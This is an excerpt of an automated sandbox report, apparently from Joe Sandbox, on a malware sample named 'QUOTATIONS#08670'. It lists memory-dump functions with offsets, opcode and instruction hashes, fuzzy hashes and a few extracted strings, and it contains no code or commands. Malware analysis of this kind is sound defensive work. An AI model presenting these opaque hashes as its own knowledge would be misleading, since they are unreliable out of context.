                                                          • Snapshot File: hcaresult_0_2_8f0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7bde5949240a22f522d1393642b2c5806892d4859c8e30f49d7646f4f55c93ed
                                                          • Instruction ID: 642c34f7bf280f8e01b8624ccf3cc345b847f44f5508f331888aa59e6f58765a
                                                          • Opcode Fuzzy Hash: 7bde5949240a22f522d1393642b2c5806892d4859c8e30f49d7646f4f55c93ed
                                                          • Instruction Fuzzy Hash: 65210DB2909B9A0FC305837D889057E3FA1FF5232031A419AEA62DB3E3D620CC45C770
                                                          Function 008FDDFC Relevance: .1, Instructions: 75COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2006993941.00000000008F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_8f0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8bf1fde42c73ccd12bce3705204555232052272daf14823ca9fa5714dce6aa44
                                                          • Instruction ID: eea5f131ce78861154f2f095ab991fe1f31f14504b1cf14a68f57754fdee7d95
                                                          • Opcode Fuzzy Hash: 8bf1fde42c73ccd12bce3705204555232052272daf14823ca9fa5714dce6aa44
                                                          • Instruction Fuzzy Hash: C7216A70904614DFC304BBB8E898A7E7FB6FF89204F80899AD1C8E3264DE345805C363
                                                          Function 0084D4F0 Relevance: .1, Instructions: 75COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2006699609.000000000084D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0084D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_84d000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 56737300ca76223d30e8f383f58ad3df08ecbf785d2efc87362156fbba8b95f4
                                                          • Instruction ID: 76a0b68e9be3f775d435b94f79da827f957a9b8b3e71d3d4dfe4334f771528fc
                                                          • Opcode Fuzzy Hash: 56737300ca76223d30e8f383f58ad3df08ecbf785d2efc87362156fbba8b95f4
                                                          • Instruction Fuzzy Hash: 6F2125B1504308DFDB05DF14D9C0B26BF65FB98318F21C569E8098B25AC736D816CAA1
                                                          Function 0085D1D4 Relevance: .1, Instructions: 72COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2006734711.000000000085D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0085D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_85d000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e58ce3db03ca83ceccf9f5f7300654563f3c2ea85be26fe6aa4b7da8838c0da2
                                                          • Instruction ID: c1359622d33a8505eb69476cdb4bf57708091dcb7fc1d8e01cafad0f7ad5b9fc
                                                          • Opcode Fuzzy Hash: e58ce3db03ca83ceccf9f5f7300654563f3c2ea85be26fe6aa4b7da8838c0da2
                                                          • Instruction Fuzzy Hash: 8C212971504304DFDB15DF14D5C0B26BB65FB84315F20C56DEC098B355C376E84ACA61
                                                          Function 0085D01C Relevance: .1, Instructions: 72COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2006734711.000000000085D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0085D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_85d000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b1a2e8428475bf9f25db1c78757412eb8600ed09cf446429e877e6e0ac37c415
                                                          • Instruction ID: 1db2c9f6922c553f90ec69cf27d4b0c4ecbd0c2a51f62723a03ada80a675a961
                                                          • Opcode Fuzzy Hash: b1a2e8428475bf9f25db1c78757412eb8600ed09cf446429e877e6e0ac37c415
                                                          • Instruction Fuzzy Hash: 5B21D075604704DFDB24DF14D984B26BB65FB88315F20C5A9EC0A8B296C33AD80BCA61
                                                          Function 008FD742 Relevance: .1, Instructions: 68COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2006993941.00000000008F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_8f0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f9e6215ce32eec72e4627806d591e46aacaf947eeb6c5ca541b037f184784e44
                                                          • Instruction ID: 8a82940c4c6be919b8ed79954fa0534df9a2c7f0d7eebc91aa08343cbd78c102
                                                          • Opcode Fuzzy Hash: f9e6215ce32eec72e4627806d591e46aacaf947eeb6c5ca541b037f184784e44
                                                          • Instruction Fuzzy Hash: 8821897191C341DFC301BB78D8A84397FB1FF86200F418EAAD4C983296DA34481AC797
                                                          Function 008F5E60 Relevance: .1, Instructions: 65COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2006993941.00000000008F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_8f0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: eb9cb442beffde664aa63bd0ddb72bcb3b3cc4edbcb60a5694846e630c4ead28
                                                          • Instruction ID: 5be3b3eb09ff8e0e84956d928043e9e7b4b7ab458dd5ed5689c15a1fdbee5712
                                                          • Opcode Fuzzy Hash: eb9cb442beffde664aa63bd0ddb72bcb3b3cc4edbcb60a5694846e630c4ead28
                                                          • Instruction Fuzzy Hash: 7B21D23270560D9FDB049F64E818B7A37A1FB88324F148069FA05CB354DB74DE64CB51
                                                          Function 008F5E70 Relevance: .1, Instructions: 62COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2006993941.00000000008F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_8f0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: fec2c29162ebedf860491115978b8fcdd37f7f2a63bc95041bab145df909bf7b
                                                          • Instruction ID: 3b2a1e0be9733a79870b9830e5e42caeb0c4e862e39f8363c27ff39df3bedd90
                                                          • Opcode Fuzzy Hash: fec2c29162ebedf860491115978b8fcdd37f7f2a63bc95041bab145df909bf7b
                                                          • Instruction Fuzzy Hash: 74117C3170560D9FDB14AF68E808A7A37A5FB88324F008069FA05CB358DF74DE65CB91
                                                          Function 0085D005 Relevance: .1, Instructions: 60COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2006734711.000000000085D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0085D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_85d000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: cafdc2a12e4332379b094eab6ea0124663227c1e520700fcc92429dd7165945a
                                                          • Instruction ID: 17dcfea8aa879252ad8712fd992825b5b1092758f8bab0abbf5b1104ed3557d3
                                                          • Opcode Fuzzy Hash: cafdc2a12e4332379b094eab6ea0124663227c1e520700fcc92429dd7165945a
                                                          • Instruction Fuzzy Hash: F6219F755097808FDB12CF24D994B15BF71FB46314F28C5EADC498B6A7C33A980ACB62
                                                          Function 0084D4EB Relevance: .1, Instructions: 56COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2006699609.000000000084D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0084D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_84d000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b6d9f8954513a289108155b17418e8e788e8b427863a5550f59da745f4ae8560
                                                          • Instruction ID: e006839e92ff833bef3c81f8e9e5301f9df3a0cfd892692a8b807e9f2761acdf
                                                          • Opcode Fuzzy Hash: b6d9f8954513a289108155b17418e8e788e8b427863a5550f59da745f4ae8560
                                                          • Instruction Fuzzy Hash: 0411AF76504344CFDB16CF10D5C4B16BF71FB94314F25C5A9E8094B256C336D85ACBA1
                                                          Function 008F4A98 Relevance: .1, Instructions: 54COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2006993941.00000000008F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_8f0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: dac7d853be5722fed5115cd82b02e7cbdec0180878c9693d428d1ba661020af2
                                                          • Instruction ID: 1c98147db252964edc4f48e2ec0c457445c54638848711859af3dabd7360194d
                                                          • Opcode Fuzzy Hash: dac7d853be5722fed5115cd82b02e7cbdec0180878c9693d428d1ba661020af2
                                                          • Instruction Fuzzy Hash: 9D11A13174062CAFC325AF38E45097E7BE9FB887507114ABEE509D7369DB329C068B84
                                                          Function 008F49C8 Relevance: .1, Instructions: 53COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2006993941.00000000008F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_8f0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f54002ca93f3a4877e82e11a3db7cc23321ef43c1a27a9fc33b63c20600dd5e2
                                                          • Instruction ID: 514b5abbf9b047ee3a0e73627f218f9ff65eb79e1e758187a1e68cb0581000b9
                                                          • Opcode Fuzzy Hash: f54002ca93f3a4877e82e11a3db7cc23321ef43c1a27a9fc33b63c20600dd5e2
                                                          • Instruction Fuzzy Hash: C3012D34F4432A8BDF546BB4541C1BE7BE6AB88211B20093EE906D3344EE758D128BD6
                                                          Function 0085D1CF Relevance: .1, Instructions: 53COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2006734711.000000000085D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0085D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_85d000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a3be7094ea246a7cddba5200c6ce82fad2e7d53e3ec886449491685f026f1607
                                                          • Instruction ID: 7ef07f24e751712f1d47c4d640c8bb5a343cb1d7ff712079172d82533dd9b1ef
                                                          • Opcode Fuzzy Hash: a3be7094ea246a7cddba5200c6ce82fad2e7d53e3ec886449491685f026f1607
                                                          • Instruction Fuzzy Hash: B1118B75504384DFDB16CF14D5C4B15BBA2FB84314F24C6ADDC498B696C33AE84ACB61
                                                          Function 0084D7B1 Relevance: .0, Instructions: 45COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2006699609.000000000084D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0084D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_84d000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c7ecd689901ae3bfccc3c4f8398c27c3cdfa15bc9aaf5c0974b6d4208f1341a7
                                                          • Instruction ID: 1deb65f0d85ad6cb602ea7dc0a96736d339773172d4bae18dc41684a0320b5c1
                                                          • Opcode Fuzzy Hash: c7ecd689901ae3bfccc3c4f8398c27c3cdfa15bc9aaf5c0974b6d4208f1341a7
                                                          • Instruction Fuzzy Hash: B201F27110430CAAE7208F1ACD84B77BFD8FF51324F18C82AEC098A286D2789800C6B1
                                                          Function 008F93D8 Relevance: .0, Instructions: 44COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2006993941.00000000008F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_8f0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1fe7cf75f35d31a3af9ef99171bdee6d9fd520b2ae1285cb492f186aa2310eda
                                                          • Instruction ID: 5ccff1a1115d41fdaec761494224e32c10b935993a27a0bd6b45c9b7ef1a964e
                                                          • Opcode Fuzzy Hash: 1fe7cf75f35d31a3af9ef99171bdee6d9fd520b2ae1285cb492f186aa2310eda
                                                          • Instruction Fuzzy Hash: F2F06D313005184B87299A3E9848B3AB69EFFE8B557550069EA8ACB361DE21CC03C794
                                                          Function 0084D7B0 Relevance: .0, Instructions: 36COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2006699609.000000000084D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0084D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_84d000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 744066c6cc4fceec0318bf2f80543eb17e1d4596b1b51091fd05b1f6cbf41f7a
                                                          • Instruction ID: f8e2a809492f80f3d42cd9a4ff1fe734c0df35a121e070b931404f4eccc59bcb
                                                          • Opcode Fuzzy Hash: 744066c6cc4fceec0318bf2f80543eb17e1d4596b1b51091fd05b1f6cbf41f7a
                                                          • Instruction Fuzzy Hash: 24F0C271404348AAE7208E06C884B72FF98FF51324F18C85AED485B286C2789C44CAB1
                                                          Function 008F5490 Relevance: .0, Instructions: 33COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2006993941.00000000008F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_8f0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7f9bbc0e6aa6467d9664f92a28c206d6c8b8b031cdb8f1155b576c402e39600b
                                                          • Instruction ID: 0af843063dc3b8d25b9fcb796d3606a9636209e54e390cd92368a74b778a9c62
                                                          • Opcode Fuzzy Hash: 7f9bbc0e6aa6467d9664f92a28c206d6c8b8b031cdb8f1155b576c402e39600b
                                                          • Instruction Fuzzy Hash: 05F04472D4535B8FCF00DBA8D815AEEBFB1EE96311F1085AAD614F7191E770168ACB80
                                                          Function 071E98CC Relevance: .0, Instructions: 32COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2024910722.00000000071E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_71e0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6f295b1afee9c6b32cc192bcb99e93fc1233b13a4c5b45d23771de2afe9638d0
                                                          • Instruction ID: 847859041c67f0e91d16bdefc44b213af7a76b7357258e4c22b6546c40f6ec7f
                                                          • Opcode Fuzzy Hash: 6f295b1afee9c6b32cc192bcb99e93fc1233b13a4c5b45d23771de2afe9638d0
                                                          • Instruction Fuzzy Hash: F9F0C2B100C2858FD3035B31E8142A13F6AAF0211574A04CEE455875B7DA25E904CB12
                                                          Function 008FD390 Relevance: .0, Instructions: 23COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2006993941.00000000008F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_8f0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d1bde13aae50ed9f0db11e608b27ddb8e713845b307c74532985431bd15f36dc
                                                          • Instruction ID: 04bdb4bc2cff59f83e1d34a8be3335d646e069f8c038faa0396f3f777b3b6bc6
                                                          • Opcode Fuzzy Hash: d1bde13aae50ed9f0db11e608b27ddb8e713845b307c74532985431bd15f36dc
                                                          • Instruction Fuzzy Hash: 83E01231B802186BE30CD96E9D55F6776DABFC4B10F2884A9B209CF3A5DE61DC0107D4
                                                          Function 008F7738 Relevance: .0, Instructions: 18COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2006993941.00000000008F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_8f0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d6f13e92c7509c3ed045fff3ba569c5fe9989689ad7b626e32dbee5397ed30c7
                                                          • Instruction ID: f0e6b622be60840af14fb170b9446af5157cc34dfb2d9f1b29246a8825286667
                                                          • Opcode Fuzzy Hash: d6f13e92c7509c3ed045fff3ba569c5fe9989689ad7b626e32dbee5397ed30c7
                                                          • Instruction Fuzzy Hash: 60E0C2340482C34FC703ABB4EA621A93F36ED8231075984A2F0810B53EEA70096FC321
                                                          Function 071E98BD Relevance: .0, Instructions: 18COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2024910722.00000000071E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_71e0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ff07d7a6cfb156b9925ace3cf1748dd7b7c8334816dc3d0998a889f5a39908e3
                                                          • Instruction ID: 3d95810678ceaf325de65c5f02abf83b4470c3af99eb35d50248f4bc66a80ab7
                                                          • Opcode Fuzzy Hash: ff07d7a6cfb156b9925ace3cf1748dd7b7c8334816dc3d0998a889f5a39908e3
                                                          • Instruction Fuzzy Hash: 2FE017B0545601CFCB065F30F81C5753B7AFE4420A346446EF42683AB5DF35E500CB02
                                                          Function 071E1F80 Relevance: .0, Instructions: 17COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2024910722.00000000071E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_71e0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ae74b09858e08b8a4a773a99def470be14a7849ddb385124f92c19fb9c4360ff
                                                          • Instruction ID: 93e6643fdf3910871d7f9e19a0f596ae4b6b37663d90d5119dee35a320c0ded6
                                                          • Opcode Fuzzy Hash: ae74b09858e08b8a4a773a99def470be14a7849ddb385124f92c19fb9c4360ff
                                                          • Instruction Fuzzy Hash: 5FD0C23090020CEF8B00DFA4E90146CB7BBFB00304B0005A8E409D3214DB316F049780
                                                          Function 008FA405 Relevance: .0, Instructions: 16COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2006993941.00000000008F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_8f0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b0b0db537d0de8b9873eae4d4fac114359cb6c1c0e9ae224fcead0f52bb1e964
                                                          • Instruction ID: 5768b8f640833d853a90ab5fa55f9d3a1091b651b1928a59dd35bb7036f70562
                                                          • Opcode Fuzzy Hash: b0b0db537d0de8b9873eae4d4fac114359cb6c1c0e9ae224fcead0f52bb1e964
                                                          • Instruction Fuzzy Hash: 9CD0673AB400189FCB04DF9DEC80CEDF776FB98321B048116E915A3261C7319925DB50
                                                          Function 008F4B48 Relevance: .0, Instructions: 13COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2006993941.00000000008F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_8f0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 173b45c0bbc0c41579e25dcb067c55322c6b33aacf61cd88c79dc9400c339fe8
                                                          • Instruction ID: 7d2089e5753078578726b72da44cacda316cc79fd558e168ee34de2592b7b3f5
                                                          • Opcode Fuzzy Hash: 173b45c0bbc0c41579e25dcb067c55322c6b33aacf61cd88c79dc9400c339fe8
                                                          • Instruction Fuzzy Hash: 0ED0125264EF981AE7139775742036AEAA15F91514F0944CBC0C54F1D3D8124A8AC34A
                                                          Function 008F7748 Relevance: .0, Instructions: 12COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2006993941.00000000008F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_8f0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a5c97aa31150f8dc2db678364f792c856461f6d2216de8fd809efd928bd58fa7
                                                          • Instruction ID: 873a4e7c8b7e35a4649b0b9812db4cb199fca4d310eaa22dd7260f7c5604ad48
                                                          • Opcode Fuzzy Hash: a5c97aa31150f8dc2db678364f792c856461f6d2216de8fd809efd928bd58fa7
                                                          • Instruction Fuzzy Hash: 29C0123414430B8AC701FB75F94661E373EFAC0310B509531B0090713DFFB4199D9691
                                                          Function 008F50E0 Relevance: .0, Instructions: 11COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2006993941.00000000008F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_8f0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 75beaef0cabef7406349cfddb2bed5176faedab8828d1b888bd49dbe5882cf8e
                                                          • Instruction ID: 674e2121da854ba39eb9436bfa097eac2cf0cb5317fda9c0ae6563e3418cc22f
                                                          • Opcode Fuzzy Hash: 75beaef0cabef7406349cfddb2bed5176faedab8828d1b888bd49dbe5882cf8e
                                                          • Instruction Fuzzy Hash: 13C0807E40B95587FF00C65098217757B15BF00349F0505FDDD559B581DE10DC11C641
                                                          Function 008F4A62 Relevance: .0, Instructions: 9COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2006993941.00000000008F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_8f0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 59cad9d283bc1d646195fd7bf274356bfe67186b61822e6590f61dacb7c3a3c0
                                                          • Instruction ID: d2d26777b91e32f1818f13cf2c20bd6612924dcd2fe9819a93141fa77209093d
                                                          • Opcode Fuzzy Hash: 59cad9d283bc1d646195fd7bf274356bfe67186b61822e6590f61dacb7c3a3c0
                                                          • Instruction Fuzzy Hash: 53C0483AA400198BCB40ABA8FD190EC7B64EA84322B000072E20A875249F6009298A41

                                                          Non-executed Functions

                                                          Function 0792F2B0 Relevance: 2.8, Strings: 2, Instructions: 298COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2025146738.0000000007920000.00000040.00000800.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7920000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: PH_q$PH_q
                                                          • API String ID: 0-3760492949
                                                          • Opcode ID: 37cf674359f53a4c901a9f64c3a6eb2fe707bbf28e5ae9d202e1419447ddbe27
                                                          • Instruction ID: aebebc8a40682d3f37dc014bbd1281ca2900c665929e34203375d1819515b5ca
                                                          • Opcode Fuzzy Hash: 37cf674359f53a4c901a9f64c3a6eb2fe707bbf28e5ae9d202e1419447ddbe27
                                                          • Instruction Fuzzy Hash: 3CD1D2B4A006158FDB18DF69C598EA9B7F2BF8C704F2580A8E505AB375CB31AD01DF60
                                                          Function 071ECBA0 Relevance: 2.1, Strings: 1, Instructions: 809COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2024910722.00000000071E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_71e0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: F
                                                          • API String ID: 0-2945319695
                                                          • Opcode ID: 3cb5f78cb0ce73daad42f3f5443bcf5c3a8d8d1b4f7029b06b53b1ec208f38cc
                                                          • Instruction ID: 8e9922dc495b0777edbc03441b5290d283b9f4740d48b203ec9bc90969ed177f
                                                          • Opcode Fuzzy Hash: 3cb5f78cb0ce73daad42f3f5443bcf5c3a8d8d1b4f7029b06b53b1ec208f38cc
                                                          • Instruction Fuzzy Hash: 8362B370F043158FCB05EFB8D85465DBBB2BF8A204F45C5AAD089EB295DE349C46CB62
                                                          Function 008FCD88 Relevance: 1.6, Strings: 1, Instructions: 380COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2006993941.00000000008F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_8f0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Xcq
                                                          • API String ID: 0-450769270
                                                          • Opcode ID: fe67d8a82ee848182db591910d7e81357935e183b1d473f9117f8efcd7f5807e
                                                          • Instruction ID: 3031870e39dd5c0b81d682f6fdbc2283125bc663f1c0355c9bc13106dff79a9e
                                                          • Opcode Fuzzy Hash: fe67d8a82ee848182db591910d7e81357935e183b1d473f9117f8efcd7f5807e
                                                          • Instruction Fuzzy Hash: F1C1B13070030D8BDB281F79994433A7AA7FFC5B01F28996ADB52D7294CE30DD419BA6
                                                          Function 071ECBD0 Relevance: .6, Instructions: 649COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2024910722.00000000071E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_71e0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 76007a0383e4b6cf619f301941dce4cf49f4490031febf1286b569ea20b9c1db
                                                          • Instruction ID: 4294c3556f6158eacb82db73e0221eff1b03cfd38d5185a94834d07131c0dbb5
                                                          • Opcode Fuzzy Hash: 76007a0383e4b6cf619f301941dce4cf49f4490031febf1286b569ea20b9c1db
                                                          • Instruction Fuzzy Hash: 5F426E71F102259FCB04EFB8D85465EBBB2BF89204F51C5A9D089EB354EF349886CB52
                                                          Function 0792E950 Relevance: .4, Instructions: 365COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2025146738.0000000007920000.00000040.00000800.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7920000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ee668aa7bc083a0600c7dd91db228a1cefebe9a79695cfb1c5bb051a645f5a3d
                                                          • Instruction ID: 78926489b9a3bad0e9a89508c2b7e6acaad57ddb1f2813b5e2901cdcaadc24ed
                                                          • Opcode Fuzzy Hash: ee668aa7bc083a0600c7dd91db228a1cefebe9a79695cfb1c5bb051a645f5a3d
